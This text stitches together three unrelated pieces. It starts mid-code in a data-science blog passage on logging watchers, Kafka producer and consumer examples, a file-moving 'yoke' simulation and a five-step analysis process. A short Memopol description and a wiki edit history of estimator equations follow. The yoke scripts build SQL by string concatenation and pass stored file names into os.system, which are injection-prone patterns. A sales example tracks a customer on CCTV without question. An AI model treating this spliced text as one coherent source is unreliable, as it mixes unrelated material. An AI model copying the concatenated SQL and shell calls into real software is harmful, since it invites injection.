        with open(os.path.join('/proc', pid, 'cmdline'), 'rb') as f:
            print(f.read())
    except IOError:  # proc has already terminated
        continue
This will give you a full list of all running processes. I normally just load this into a table every minute or so, to create a monitor pattern for the ecosystem.
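A minimal sketch of that monitor pattern, assuming the psutil package is installed; the database path and table name are illustrative:

import datetime
import sqlite3 as sq
import pandas as pd
import psutil

# Snapshot the running processes into a data frame
snapshot = pd.DataFrame([p.info for p in psutil.process_iter(['pid', 'name'])])
snapshot['SnapshotTime'] = datetime.datetime.now().isoformat()

# Append the snapshot to a central monitor table
conn = sq.connect('C:/VKHCG/77-Yoke/99-SQLite/Monitor.db')
snapshot.to_sql('ProcessMonitor', conn, if_exists='append', index=False)
conn.close()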
### Communication
All communication from the system is handled in this one section, to ensure that the system can communicate any activities that are happening. We are using a complex communication process via Jira, to ensure we have all our data science tracked. I suggest you look at conda install -c conda-forge jira.
I will not provide further details on this subject, as I have found that the internal communication channel in any company is driven by the communication tools it uses. The only advice I will offer is to communicate! You would be alarmed if, at least once a week, you lost a project owing to someone not communicating what they are running.
The alerting section uses communications to inform the correct person, at the correct time, about the correct status of the complete system. I use Jira for alerting, and it works well. If any issue is raised, alerting provides complete details of what the status was and the errors it generated.
I will now discuss each of these sections in more detail and offer practical examples of what to expect or create in each section.
#### The Audit, Balance, and Control Layer
The audit, balance, and control layer controls any processing currently underway. This layer is the engine that ensures that each processing request is completed by the ecosystem as planned.
The audit, balance, and control layer is the single area in which you can observe what is currently running within your data scientist environment.
It records
• Process-execution statistics
• Balancing and controls
• Rejects and error handling
• Fault codes management
The three subareas are utilized in the following manner.
### Audit
First, let's define what I mean by an audit. An audit is a systematic and independent examination of the ecosystem. The audit sublayer records the processes that are running at any specific point within the environment.
This information is used by data scientists and engineers to understand and plan future improvements to the processing.
Tip Make sure your algorithms and processing generate a good and complete audit trail.
My experience shows that a good audit trail is crucial. The use of the built-in audit capabilities of the data science technology stack's components supplies you with a rapid and effective base for your auditing. I will discuss which audit statistics are essential to the success of your data science.
In the data science ecosystem, the audit consists of a series of observers that record preapproved processing indicators regarding the ecosystem. I have found the following to be good indicators for audit purposes.
### Built-in Logging
I advise you to design your logging into an organized preapproved location, to ensure that you capture every relevant log entry.
I also recommend that you do not change the internal or built-in logging process of any of the data science tools, as this will make any future upgrades complex and costly. I suggest that you handle the logs in the same manner as you would any other data source.
Normally, I build a controlled, systematic, and independent examination of all the built-in logging vaults. That way, I am sure I can independently collect and process these logs across the ecosystem. I deploy five independent watchers for each logging location, as logging usually has the following five layers.
### Debug Watcher
This is the most verbose logging level. If I discover any debug logs in my ecosystem, I normally raise an alarm, as this means that the tool is using precious processing cycles to perform low-level debugging.
Warning Tools running debugging should not be part of a production system.
### Information Watcher
The information level is normally utilized to output information that is beneficial to the running and management of a system. I pipe these logs to the central Audit, Balance, and Control data store, using the ecosystem as I would any other data source.
### Warning Watcher
The warning level is often used for handled "exceptions" or other important log events. Usually, this means that the tool handled the issue and took corrective action for recovery.
I pipe these logs to the central Audit, Balance, and Control data store, using the ecosystem as I would any other data source. I also add a warning to the Performing a Cause and Effect Analysis System data store. I will discuss this critical tool later in this blog.
### Error Watcher
The error is used to log all unhandled exceptions in the tool. This is not a good state for the overall processing to be in, as it means that a specific step in the planned processing did not complete as expected. Now, the ecosystem must handle the issue and take corrective action for recovery.
I pipe these logs to the central Audit, Balance, and Control data store, using the ecosystem as I would any other data source. I also add an error to the Performing a Cause and Effect Analysis System data store.
### Fatal Watcher
Fatal is reserved for special exceptions/conditions for which it is imperative that you quickly identify these events. This is not a good state for the overall processing to be in, as it means a specific step in the planned processing has not completed as expected. This means the ecosystem must now handle the issue and take corrective action for recovery.
Once again, I pipe these logs to the central Audit, Balance, and Control data store, using the ecosystem as I would any other data source. I also add an error to the Performing a Cause and Effect Analysis System data store, which I will discuss later in this blog.
I have discovered that by simply using built-in logging and a good cause-and-effect analysis system, I can handle more than 95% of all issues that arise in the ecosystem.
### Basic Logging
Following is a basic logging process I normally deploy in my data science. Open your Python editor and enter the following logging example. You will require the following libraries:
import sys
import os
import logging
import uuid
import shutil
import time
You next set up the basic ecosystem, as follows:
if sys.platform == 'linux':
    Base=os.path.expanduser('~') + '/VKHCG'
else:
    Base='C:/VKHCG'
You need the following constants to cover the ecosystem:
sCompanies=['01-Vermeulen','02-Krennwallner','03-Hillman','04-Clark']
sLayers=['01-Retrieve','02-Assess','03-Process','04-Transform','05-Organise','06-Report']
sLevels=['debug','info','warning','error']
You can now build the loops to perform a basic logging run.
for sCompany in sCompanies:
    sFileDir=Base + '/' + sCompany
    if not os.path.exists(sFileDir):
        os.makedirs(sFileDir)
    for sLayer in sLayers:
        log = logging.getLogger()  # root logger
        for hdlr in log.handlers[:]:  # remove all old handlers
            log.removeHandler(hdlr)
        sFileDir=Base + '/' + sCompany + '/' + sLayer + '/Logging'
        if os.path.exists(sFileDir):
            shutil.rmtree(sFileDir)
        time.sleep(2)
        if not os.path.exists(sFileDir):
            os.makedirs(sFileDir)
        skey=str(uuid.uuid4())
        sLogFile=Base + '/' + sCompany + '/' + sLayer + '/Logging/Logging_'+skey+'.log'
        print('Set up:',sLogFile)
You set up logging to file, as follows:
        logging.basicConfig(level=logging.DEBUG,
                            format='%(asctime)s %(name)-12s %(levelname)-8s %(message)s',
                            datefmt='%m-%d %H:%M',
                            filename=sLogFile,
                            filemode='w')
You define a handler, which writes INFO messages or higher to sys.stderr.
        console = logging.StreamHandler()
        console.setLevel(logging.INFO)
You set a format for console use.
        formatter = logging.Formatter('%(name)-12s: %(levelname)-8s %(message)s')
You activate the handler to use this format.
        console.setFormatter(formatter)
Now, add the handler to the root logger.
        logging.getLogger('').addHandler(console)
        logging.info('Practical Data Science is fun!')
Test all the other levels.
        for sLevel in sLevels:
            sApp='Application-'+ sCompany + '-' + sLayer + '-' + sLevel
            logger = logging.getLogger(sApp)
            if sLevel == 'debug':
                logger.debug('Practical Data Science logged a debugging message.')
            if sLevel == 'info':
                logger.info('Practical Data Science logged an information message.')
            if sLevel == 'warning':
                logger.warning('Practical Data Science logged a warning message.')
            if sLevel == 'error':
                logger.error('Practical Data Science logged an error message.')
This logging enables you to log everything that occurs in your data science processing to a central file, for each run of the process.
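Because the log format above is fixed, you can then treat the log files themselves as a data source. A minimal sketch, where the log file name is a placeholder for one of the generated files and the parsing is my own illustration:

import pandas as pd

sLogFile = 'C:/VKHCG/01-Vermeulen/01-Retrieve/Logging/Logging_example.log'  # placeholder name
records = []
with open(sLogFile) as log:
    for line in log:
        # '%m-%d %H:%M name level message' -> date, time, logger, level, message
        parts = line.rstrip('\n').split(maxsplit=4)
        if len(parts) == 5:
            records.append(dict(zip(['Date', 'Time', 'Logger', 'Level', 'Message'], parts)))
LogData = pd.DataFrame(records)
print(LogData.head())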
### Process Tracking
I normally build a controlled, systematic, and independent examination of the process for the hardware logging. There are numerous server-based software packages that monitor the temperature sensors, voltage, fan speeds, and load and clock speeds of a computer system.
I suggest you go with the tool with which you and your customer are most comfortable. I do, however, advise that you use the logs for your cause-and-effect analysis system.
### Data Provenance
Keep records for every data entity in the data lake, by tracking it through all the transformations in the system. This ensures that you can reproduce the data, if needed, in the future and supplies a detailed history of the data’s source in the system.
### Data Lineage
Keep records of every change that happens to the individual data values in the data lake. This enables you to know what the exact value of any data record was in the past. It is normally achieved by a valid-from and valid-to audit entry for each data set in the data science environment.
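A minimal sketch of that valid-from/valid-to pattern; the table layout and the update_value helper are my own illustration, not a prescribed utility:

import sqlite3 as sq
import datetime

conn = sq.connect(':memory:')  # illustrative; a shared lineage database in practice
conn.execute('CREATE TABLE Lineage ('
             'RecordKey TEXT, Value TEXT, ValidFrom TEXT, ValidTo TEXT)')

def update_value(key, new_value):
    now = datetime.datetime.now().isoformat()
    # Close the currently valid entry ...
    conn.execute('UPDATE Lineage SET ValidTo=? WHERE RecordKey=? AND ValidTo IS NULL',
                 (now, key))
    # ... and open a new one, so every historical value remains queryable
    conn.execute('INSERT INTO Lineage VALUES (?,?,?,NULL)', (key, new_value, now))
    conn.commit()

update_value('Country-826', 'United Kingdom of Great Britain')
update_value('Country-826', 'United Kingdom')
for row in conn.execute('SELECT * FROM Lineage'):
    print(row)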
### Balance
The balance sublayer ensures that the ecosystem is balanced across the accessible processing capability, or that it can top up capability during periods of extreme processing. The on-demand processing capability of a cloud ecosystem is highly desirable for this purpose.
Tip Plan your capability as a combination of always-on and top-up processing.
By using the audit trail, it is possible to adapt to changing requirements and forecast what you will require to complete the schedule of work you submitted to the ecosystem. I have found that deploying a deep reinforcement learning algorithm against the cause-and-effect analysis system can handle any balance requirements dynamically.
Note In my experience, even the best pre-planned solution for processing will disintegrate against a good deep learning algorithm with reinforcement learning capability handling the balance in the ecosystem.
### Control
The control sublayer controls the execution of the currently active data science. The control elements are a combination of the control element within the Data Science Technology Stack’s individual tools plus a custom interface to control the overarching work.
The control sublayer also ensures that when processing experiences an error, it can try a recovery, as per your requirements, or schedule a clean-up utility to undo the error. The cause-and-effect analysis system is the core data source for the distributed control system in the ecosystem.
I normally use a distributed yoke solution to control the processing. I create an independent process that is created solely to monitor a specific portion of the data processing ecosystem control.
So, the control system consists of a series of yokes at each control point that uses Kafka messaging to communicate the control requests. The yoke then converts the requests into a process to execute and manage in the ecosystem.
The yoke system ensures that the distributed tasks are completed, even if it loses contact with the central services. The yoke solution is extremely useful in an Internet of Things environment, as you are not always able to communicate directly with the data source.
#### Yoke Solution
The yoke solution is a custom design I have worked on over years of deployments. Apache Kafka is an open source stream processing platform developed to deliver a unified, high-throughput, low-latency platform for handling real-time data feeds. Kafka provides a publish-subscribe solution that can handle all activity-stream data and processing.
The Kafka environment enables you to send messages between producers and consumers that enable you to transfer control between different parts of your ecosystem while ensuring a stable process.
I will give you a simple example of the type of information you can send and receive.
### Producer
The producer is the part of the system that generates the requests for data science processing, by creating structured messages for each type of data science process it requires. The producer is the end point of the pipeline that loads messages into Kafka.
Note This is for your information only. You do not have to code this and make it run.
from kafka import KafkaProducer
producer = KafkaProducer(bootstrap_servers='localhost:1234')
for _ in range(100):
    producer.send('Retrieve', b'Person.csv')
# Block until a single message is sent (or timeout)
future = producer.send('Retrieve', b'Last_Name.json')
result = future.get(timeout=60)
# Block until all pending messages are at least put on the network
# NOTE: This does not guarantee delivery or success! It is really
# only useful if you configure internal batching using linger_ms
producer.flush()
# Use a key for hashed-partitioning
producer.send('York', key=b'Retrieve', value=b'Run')
# Serialize json messages
import json
producer = KafkaProducer(value_serializer=lambda v: json.dumps(v).encode('utf-8'))
producer.send('Retrieve', {'Retrieve': 'Run'})
# Serialize string keys
producer = KafkaProducer(key_serializer=str.encode)
producer.send('Retrieve', key='ping', value=b'1234')
# Compress messages
producer = KafkaProducer(compression_type='gzip')
for i in range(1000):
    producer.send('Retrieve', b'msg %d' % i)
### Consumer
The consumer is the part of the process that takes in messages and organizes them for processing by the data science tools. The consumer is the end point of the pipeline that offloads the messages from Kafka.
Note This is for your information only. You do not have to code this and make it run.
from kafka import KafkaConsumer
import msgpack
consumer = KafkaConsumer('Yoke')
for msg in consumer:
    print(msg)
# join a consumer group for dynamic partition assignment and offset commits
from kafka import KafkaConsumer
consumer = KafkaConsumer('Yoke', group_id='Retrieve')
for msg in consumer:
    print(msg)
# manually assign the partition list for the consumer
from kafka import TopicPartition
consumer = KafkaConsumer(bootstrap_servers='localhost:1234')
consumer.assign([TopicPartition('Retrieve', 2)])
msg = next(consumer)
# Deserialize msgpack-encoded values
consumer = KafkaConsumer(value_deserializer=msgpack.loads)
consumer.subscribe(['Yoke'])
for msg in consumer:
    assert isinstance(msg.value, dict)
### Directed Acyclic Graph Scheduling
This solution uses a combination of graph theory and publish-subscribe stream data processing to enable scheduling.
You can use the Python NetworkX library to resolve any conflicts, by simply formulating the graph into a specific point before or after you send or receive messages via Kafka. That way, you ensure an effective and efficient processing pipeline.
Tip I normally publish the request onto three different message queues, to ensure that the pipeline is complete. The extra redundancy outweighs the extra processing, as the message is typically very small.
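A minimal sketch of that triple-publish pattern with kafka-python, where the topic names are illustrative assumptions and the server address reuses the producer example above:

from kafka import KafkaProducer

producer = KafkaProducer(bootstrap_servers='localhost:1234')
# Publish the same small request onto three queues for redundancy
for topic in ['Retrieve-A', 'Retrieve-B', 'Retrieve-C']:
    producer.send(topic, b'Person.csv')
producer.flush()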
### Yoke Example
Following is a simple simulation of what I suggest you perform with your processing. Open your Python editor and create the following three parts of the yoke processing pipeline:
Create a file called Run-Yoke.py in the directory ..\VKHCG\77-Yoke.
Enter this code into the file and save it.
# -*- coding: utf-8 -*-
import sys
import os
import shutil
def prepecosystem():
    if sys.platform == 'linux':
        Base=os.path.expanduser('~') + '/VKHCG'
    else:
        Base='C:/VKHCG'
    sFileDir=Base + '/77-Yoke'
    if not os.path.exists(sFileDir):
        os.makedirs(sFileDir)
    sFileDir=Base + '/77-Yoke/10-Master'
    if not os.path.exists(sFileDir):
        os.makedirs(sFileDir)
    sFileDir=Base + '/77-Yoke/20-Slave'
    if not os.path.exists(sFileDir):
        os.makedirs(sFileDir)
    return Base
def makeslavefile(Base,InputFile):
    sFileNameIn=Base + '/77-Yoke/10-Master/'+InputFile
    sFileNameOut=Base + '/77-Yoke/20-Slave/'+InputFile
    if os.path.isfile(sFileNameIn):
        shutil.move(sFileNameIn,sFileNameOut)

if __name__ == '__main__':
    print('### Start ############################################')
    Base = prepecosystem()
    sFiles=list(sys.argv)
    for sFile in sFiles:
        if sFile != 'Run-Yoke.py':
            print(sFile)
            makeslavefile(Base,sFile)
    print('### Done!! ############################################')
Next, create the Master Producer Script. This script will place nine files in the master message queue simulated by a directory called 10-Master.
Create a file called Master-Yoke.py in the directory ..\VKHCG\77-Yoke.
# -*- coding: utf-8 -*-
import sys
import os
import sqlite3 as sq
from pandas.io import sql
import uuid
import re
from multiprocessing import Process
def prepecosystem():
    if sys.platform == 'linux':
        Base=os.path.expanduser('~') + '/VKHCG'
    else:
        Base='C:/VKHCG'
    sFileDir=Base + '/77-Yoke'
    if not os.path.exists(sFileDir):
        os.makedirs(sFileDir)
    sFileDir=Base + '/77-Yoke/10-Master'
    if not os.path.exists(sFileDir):
        os.makedirs(sFileDir)
    sFileDir=Base + '/77-Yoke/20-Slave'
    if not os.path.exists(sFileDir):
        os.makedirs(sFileDir)
    sFileDir=Base + '/77-Yoke/99-SQLite'
    if not os.path.exists(sFileDir):
        os.makedirs(sFileDir)
    sDatabaseName=Base + '/77-Yoke/99-SQLite/Yoke.db'
    conn = sq.connect(sDatabaseName)
    print('Connecting :',sDatabaseName)
    sSQL='CREATE TABLE IF NOT EXISTS YokeData (PathFileName VARCHAR (1000) NOT NULL);'
    sql.execute(sSQL,conn)
    conn.commit()
    conn.close()
    return Base,sDatabaseName
def makemasterfile(sseq,Base,sDatabaseName):
    sFileName=Base + '/77-Yoke/10-Master/File_' + sseq + '_' + str(uuid.uuid4()) + '.txt'
    sFileNamePart=os.path.basename(sFileName)
    smessage="Practical Data Science Yoke \n File: " + sFileName
    with open(sFileName, "w") as txt_file:
        txt_file.write(smessage)
    connmerge = sq.connect(sDatabaseName)
    sSQLRaw="INSERT OR REPLACE INTO YokeData(PathFileName) VALUES ('" + sFileNamePart + "');"
    sSQL=re.sub(r'\s{2,}', ' ', sSQLRaw)
    sql.execute(sSQL,connmerge)
    connmerge.commit()
    connmerge.close()
if __name__ == '__main__':
    print('### Start ############################################')
    Base,sDatabaseName = prepecosystem()
    for t in range(1,10):
        sFile='{num:06d}'.format(num=t)
        print('Spawn:',sFile)
        p = Process(target=makemasterfile, args=(sFile,Base,sDatabaseName))
        p.start()
        p.join()
    print('### Done!! ############################################')
Execute the master script to load the messages into the yoke system.
Next, create the Slave Consumer Script. This script will retrieve the nine file messages from the yoke database and move the corresponding files into the slave message queue, simulated by a directory called 20-Slave. Create a file called Slave-Yoke.py in the directory ..\VKHCG\77-Yoke.
# -*- coding: utf-8 -*-
import sys
import os
import sqlite3 as sq
from pandas.io import sql
import pandas as pd
from multiprocessing import Process
def prepecosystem():
    if sys.platform == 'linux':
        Base=os.path.expanduser('~') + '/VKHCG'
    else:
        Base='C:/VKHCG'
    sFileDir=Base + '/77-Yoke'
    if not os.path.exists(sFileDir):
        os.makedirs(sFileDir)
    sFileDir=Base + '/77-Yoke/10-Master'
    if not os.path.exists(sFileDir):
        os.makedirs(sFileDir)
    sFileDir=Base + '/77-Yoke/20-Slave'
    if not os.path.exists(sFileDir):
        os.makedirs(sFileDir)
    sFileDir=Base + '/77-Yoke/99-SQLite'
    if not os.path.exists(sFileDir):
        os.makedirs(sFileDir)
    sDatabaseName=Base + '/77-Yoke/99-SQLite/Yoke.db'
    conn = sq.connect(sDatabaseName)
    print('Connecting :',sDatabaseName)
    sSQL='CREATE TABLE IF NOT EXISTS YokeData (PathFileName VARCHAR (1000) NOT NULL);'
    sql.execute(sSQL,conn)
    conn.commit()
    conn.close()
    return Base,sDatabaseName
def makeslavefile(Base,InputFile):
    sExecName=Base + '/77-Yoke/Run-Yoke.py'
    sExecLine='python ' + sExecName + ' ' + InputFile
    os.system(sExecLine)
if __name__ == '__main__':
    print('### Start ############################################')
    Base,sDatabaseName = prepecosystem()
    connslave = sq.connect(sDatabaseName)
    sSQL="SELECT PathFileName FROM YokeData;"
    SlaveData=pd.read_sql_query(sSQL, connslave)
    for t in range(SlaveData.shape[0]):
        sFile=str(SlaveData['PathFileName'][t])
        print('Spawn:',sFile)
        p = Process(target=makeslavefile, args=(Base,sFile))
        p.start()
        p.join()
    print('### Done!! ############################################')
Execute the script and observe the slave script retrieving the messages and then using Run-Yoke.py to move the files between the 10-Master and 20-Slave directories.
This is a simulation of how you could use systems such as Kafka to send messages via a producer and, later, via a consumer to complete the process, by retrieving the messages and executing another process to handle the data science processing.
Well done, you just successfully simulated a simple message system.
Tip In this manner, I have successfully passed messages between five data centers across four time zones. It is worthwhile to invest time and practice to achieve a high level of expertise with using messaging solutions.
#### Cause-and-Effect Analysis System
The cause-and-effect analysis system is the part of the ecosystem that collects all the logs, schedules, and other ecosystem-related information and enables data scientists to evaluate the quality of their system.
Advice Apply the same data science techniques to this data set, to uncover the insights you need to improve your data science ecosystem.
You have now successfully completed the management sections of the ecosystem. I will now introduce the core data science process for this blog.
#### Functional Layer
The functional layer of the data science ecosystem is the largest and most essential layer for programming and modeling. Any data science project must have processing elements in this layer.
The layer performs all the data processing chains for practical data science. Before I officially begin the discussion of the functional layer, I want to share the fundamental data science process that has served me well.
#### Data Science Process
Following are the five fundamental data science process steps that are the core of my approach to practical data science.
#### Begin by Asking a What-If Question
Decide what you want to know, even if it is only which subset of the data lake you want to use for your data science; that is a good start.
For example, consider a small car dealership. Suppose I have been informed that Bob was looking at cars last weekend. Therefore, I ask: “What if I knew which car my customer Bob will buy next?”
#### Take a Guess at a Potential Pattern
Use your experience or insights to guess a pattern you want to discover, to uncover additional insights from the data you already have.
For example, I guess Bob buys a car every three years, and as he currently owns a three-year-old Audi, he will likely buy another Audi. I have no proof; it is just a guess, or so-called gut feeling, that I could test with my data science techniques.
#### Gather Observations and Use Them to Produce a Hypothesis
So, I start collecting car-buying patterns on Bob and formulate a hypothesis about his future behavior. For those of you who have not heard of a hypothesis, it is a proposed explanation, prepared on the basis of limited evidence, as a starting point for further investigation.
“I saw Bob looking at cars last weekend in his Audi” then becomes “Bob will buy an Audi next, as his normal three-year buying cycle is approaching.”
#### Use Real-World Evidence to Verify the Hypothesis
Now, we verify our hypothesis with real-world evidence. On our CCTV, I can see that Bob is looking only at Audis and returned to view a yellow Audi R8 five times over the last two weeks. On the sales ledger, I see that Bob bought an Audi both three years ago and six years ago. Bob’s buying pattern, then, is every three years.
So, our hypothesis is verified: Bob wants to buy my yellow Audi R8.
#### Collaborate Promptly and Regularly with Customers and Subject Matter Experts As You Gain Insights
The moment I discover Bob’s intentions, I contact the salesperson, and we successfully sell Bob the yellow Audi R8.
These five steps work, but I will acknowledge that they serve only as my guide while prototyping. Once you start working with massive volumes, velocities, and variance in data, you will need a more structured framework to handle the data science.
So, let’s discuss the functional layer of the framework in more detail.
As previously mentioned, the functional layer of the data science ecosystem is the largest and most essential layer for programming and modeling. It is the part of the framework that runs the comprehensive data science processing.
Warning: When database administrators refer to a data model, they mean data schemas and data formats. In the data science world, a data model is a set of algorithms and processing rules applied as part of data processing pipelines. So, make sure that everyone you talk to is clear on which meaning is intended, in all communication channels.
The functional layer consists of several structures, as follows:
Data schemas and data formats: Functional data schemas and data formats deploy onto the data lake’s raw data, to perform the required schema-on-query via the functional layer (a minimal sketch follows this list).
Data models: These form the basis for future processing to enhance the processing capabilities of the data lake, by storing already processed data sources for future use by other processes against the data lake.
Processing algorithms: The functional processing is performed via a series of well-designed algorithms across the processing chain.
Provisioning of infrastructure: The functional infrastructure provision enables the framework to add processing capability to the ecosystem, using technology such as Apache Mesos, which enables the dynamic provisioning of processing work cells.
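As an illustration of schema-on-query, here is a minimal sketch that applies a schema to a raw data-lake file only at query time; the file name and column types are hypothetical, not part of the framework itself.

import pandas as pd

# Hypothetical raw data-lake file; the schema lives in code, not in the file.
schema = {'CustomerID': 'int64', 'City': 'string', 'Revenue': 'float64'}

# Schema-on-query: types are applied when the data is read, not when stored.
df = pd.read_csv('raw_customers.csv', dtype=schema)
print(df.dtypes)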
The processing algorithms and data models are spread across six super steps for processing the data lake.
1. Retrieve
This super step contains all the processing chains for retrieving data from the raw data lake into a more structured format.
2. Assess
This super step contains all the processing chains for quality assurance and additional data enhancements.
3. Process
This super step contains all the processing chains for building the data vault.
4. Transform
This super step contains all the processing chains for building the data warehouse from the core data vault.
5. Organize
This super step contains all the processing chains for building the data marts from the core data warehouse.
6. Report
This super step contains all the processing chains for building virtualization and reporting of the actionable knowledge.
These six super steps, discussed in detail in individual blogs devoted to them, enable the reader to master both the steps and the relevant tools from the Data Science Technology Stack.
|
|
## What is Memopol?
Written by Memopol Team on 01/01/2015.
Political Memory is a tool designed by La Quadrature du Net to help European citizens to reach members of European Parliament (MEPs) and track their voting records on issues related to fundamental freedoms online.
|
|
## Main.EstimatorObjective History
March 19, 2019, at 02:56 PM by 10.35.117.63 -
Changed line 91 from:
The spread of HIV in a patient is approximated with balance equations on (H)ealthy, (I)nfected, and (V)irus population counts2.
to:
The spread of HIV in a patient is approximated with balance equations on (H)ealthy, (I)nfected, and (V)irus population counts2. Additional information on the HIV model is at the Process Dynamic and Control Course.
Changed line 67 from:
$$x,u,p=\mathrm{states,\,inputs,\,parameters}$$
to:
$$x,y,p=\mathrm{states,\,outputs,\,parameters}$$
Changed lines 39-41 from:
$$\Delta p_U \ge p - \hat p$$
$$\Delta p_L \ge \hat p - p$$
to:
$$\Delta p_U \ge p_i - p_{i-1}$$
$$\Delta p_L \ge p_{i-1} - p_i$$
Changed lines 11-12 from:
$$\min_{x,y,p} \Phi = \left(y_x-y\right)^T W_x \left(y_x-y\right) + \left(y-\hat y\right)^T W_m \left(y-\hat y\right) + \Delta p^T c_{\Delta p} \Delta p$$
to:
$$\min_{x,y,p} \Phi = \left(y_x-y\right)^T W_x \left(y_x-y\right) + \left(y-\hat y\right)^T W_m \left(y-\hat y\right) + \Delta p^T W_{\Delta p} \Delta p$$
Changed line 63 from:
$$c_{\Delta p}=\mathrm{parameter\,movement\,penalty\,(DCOST)}$$
to:
$$w_{\Delta p},W_{\Delta p}=\mathrm{parameter\,movement\,penalty\,(DCOST)}$$
Changed line 55 from:
$$y=\mathrm{\mathrm{model\,predictions}$$
to:
$$y=\mathrm{model\,predictions}$$
Changed lines 51-77 from:
$$\Phi = \mathrm{Objective\,Function}$$
$$y_x$$ = measurements
$$y$$ = model predictions
$$\hat y$$ = prior model values
$$w_x, W_x$$ = measurement deviation penalty (WMEAS)
$$w_m, W_m$$ = prior prediction deviation penalty (WMODEL)
$$c_{\Delta p}$$ = parameter movement penalty (DCOST)
$$db$$ = dead-band for noise rejection
$$x,u,p$$ = states, inputs, parameters
$$\Delta p$$ = parameter change
$$f,g$$ = equality and inequality constraints
$$e_U,e_L$$ = upper and lower error outside dead-band
$$c_U,c_L$$ = upper and lower deviation from prior model prediction
$$\Delta p_U,\Delta p_L$$ = upper and lower parameter change
to:
$$\Phi=\mathrm{Objective\,Function}$$
$$y_x=\mathrm{measurements}$$
$$y=\mathrm{\mathrm{model\,predictions}$$
$$\hat y=\mathrm{prior\,model\,values}$$
$$w_x, W_x=\mathrm{measurement\,deviation\,penalty\,(WMEAS)}$$
$$w_m, W_m=\mathrm{prior\,prediction\,deviation\,penalty\,(WMODEL)}$$
$$c_{\Delta p}=\mathrm{parameter\,movement\,penalty\,(DCOST)}$$
$$db=\mathrm{dead-band\,for\,noise\,rejection}$$
$$x,u,p=\mathrm{states,\,inputs,\,parameters}$$
$$\Delta p=\mathrm{parameter\,change}$$
$$f,g=\mathrm{equality\,and\,inequality\,constraints}$$
$$e_U,e_L=\mathrm{upper\,and\,lower\,error\,outside\,dead-band}$$
$$c_U,c_L=\mathrm{upper\,and\,lower\,deviation\,from\,prior\,model\,prediction}$$
$$\Delta p_U,\Delta p_L=\mathrm{upper\,and\,lower\,parameter\,change}$$
Changed line 51 from:
$$\Phi = \mathrm{Objective Function}$$
to:
$$\Phi = \mathrm{Objective\,Function}$$
Changed line 51 from:
$$\Phi$$ = Objective Function
to:
$$\Phi = \mathrm{Objective Function}$$
Changed lines 51-77 from:
to:
$$\Phi$$ = Objective Function
$$y_x$$ = measurements
$$y$$ = model predictions
$$\hat y$$ = prior model values
$$w_x, W_x$$ = measurement deviation penalty (WMEAS)
$$w_m, W_m$$ = prior prediction deviation penalty (WMODEL)
$$c_{\Delta p}$$ = parameter movement penalty (DCOST)
$$db$$ = dead-band for noise rejection
$$x,u,p$$ = states, inputs, parameters
$$\Delta p$$ = parameter change
$$f,g$$ = equality and inequality constraints
$$e_U,e_L$$ = upper and lower error outside dead-band
$$c_U,c_L$$ = upper and lower deviation from prior model prediction
$$\Delta p_U,\Delta p_L$$ = upper and lower parameter change
Changed line 11 from:
$$\min_{x,y,p} \Phi = \left(y_x-y\right)^T W_m \left(y_x-y\right) + \Delta p^T c_{\Delta p} \Delta p + \left(y-\hat y\right)^T W_p \left(y-\hat y\right)$$
to:
$$\min_{x,y,p} \Phi = \left(y_x-y\right)^T W_x \left(y_x-y\right) + \left(y-\hat y\right)^T W_m \left(y-\hat y\right) + \Delta p^T c_{\Delta p} \Delta p$$
Changed lines 23-24 from:
$$\min_{x,y,p} \Phi = w_m^T \left(e_U+e_L\right) + w_p^T \left(c_U+c_L\right) + w_{\Delta p}^T \left(\Delta p_U+\Delta p_L\right)$$
to:
$$\min_{x,y,p} \Phi = w_x^T \left(e_U+e_L\right) + w_m^T \left(c_U+c_L\right) + w_{\Delta p}^T \left(\Delta p_U+\Delta p_L\right)$$
Changed lines 39-43 from:
$$e_U, e_L, c_U, c_L \ge 0$$
to:
$$\Delta p_U \ge p - \hat p$$
$$\Delta p_L \ge \hat p - p$$
$$e_U, e_L, c_U, c_L, \Delta p_U, \Delta p_L \ge 0$$
Changed line 23 from:
$$\min_{x,y,p} \Phi = w_m^T \left(e_U+e_L\right) + w_p^T \left(c_U+c_L\right) + \left| \Delta p \right|^T c_{\Delta p}$$
to:
$$\min_{x,y,p} \Phi = w_m^T \left(e_U+e_L\right) + w_p^T \left(c_U+c_L\right) + w_{\Delta p}^T \left(\Delta p_U+\Delta p_L\right)$$
Changed line 23 from:
$$\min_{x,y,p} \Phi = w_m^T \left(e_U+e_L\right) + w_p^T \left(c_U+c_L\right) + \Delta p^T c_{\Delta p}$$
to:
$$\min_{x,y,p} \Phi = w_m^T \left(e_U+e_L\right) + w_p^T \left(c_U+c_L\right) + \left| \Delta p \right|^T c_{\Delta p}$$
Changed lines 11-12 from:
$$\min_{x,y,p} \Phi = \left(y_x-y\right)^T W_m \left(y_x-y\right) + \Delta p^T c_{\Delta p} + \left(y-\hat y\right)^T W_p \left(y-\hat y\right)$$
to:
$$\min_{x,y,p} \Phi = \left(y_x-y\right)^T W_m \left(y_x-y\right) + \Delta p^T c_{\Delta p} \Delta p + \left(y-\hat y\right)^T W_p \left(y-\hat y\right)$$
Changed line 23 from:
$$\min_{x,y,p} \Phi = w_m^T \left(e_U+e_L\right) + w_p^T \left(c_U+c_L\right) + \Delta p^T c_{\Delta p} \Delta p$$
to:
$$\min_{x,y,p} \Phi = w_m^T \left(e_U+e_L\right) + w_p^T \left(c_U+c_L\right) + \Delta p^T c_{\Delta p}$$
Changed line 23 from:
$$\min_{x,y,p} \Phi = w_m^T \left(e_U+e_L\right) + w_p^T \left(c_U+c_L\right) + \Delta p^T c_{\Delta p}$$
to:
$$\min_{x,y,p} \Phi = w_m^T \left(e_U+e_L\right) + w_p^T \left(c_U+c_L\right) + \Delta p^T c_{\Delta p} \Delta p$$
Changed line 37 from:
$$c_U \ge \hat y - y$$
to:
$$c_L \ge \hat y - y$$
June 08, 2018, at 03:50 AM by 45.56.3.173 -
Changed lines 31-33 from:
$$e_U \ge y_{pred} - y_{meas} - \frac{db}{2}$$
$$e_L \ge y_{meas} - y_{pred} - \frac{db}{2}$$
to:
$$e_U \ge y - y_x - \frac{db}{2}$$
$$e_L \ge y_x - y - \frac{db}{2}$$
June 08, 2018, at 03:47 AM by 45.56.3.173 -
Changed lines 11-14 from:
$$\min_{x,y,p,d} \Phi$$
$$\Phi = \left(y_x-y\right)^T W_m \left(y_x-y\right) + \Delta p^T c_{\Delta p} + \left(y-\hat y\right)^T W_p \left(y-\hat y\right)$$
to:
$$\min_{x,y,p} \Phi = \left(y_x-y\right)^T W_m \left(y_x-y\right) + \Delta p^T c_{\Delta p} + \left(y-\hat y\right)^T W_p \left(y-\hat y\right)$$
$$\mathrm{subject\;\;to}$$
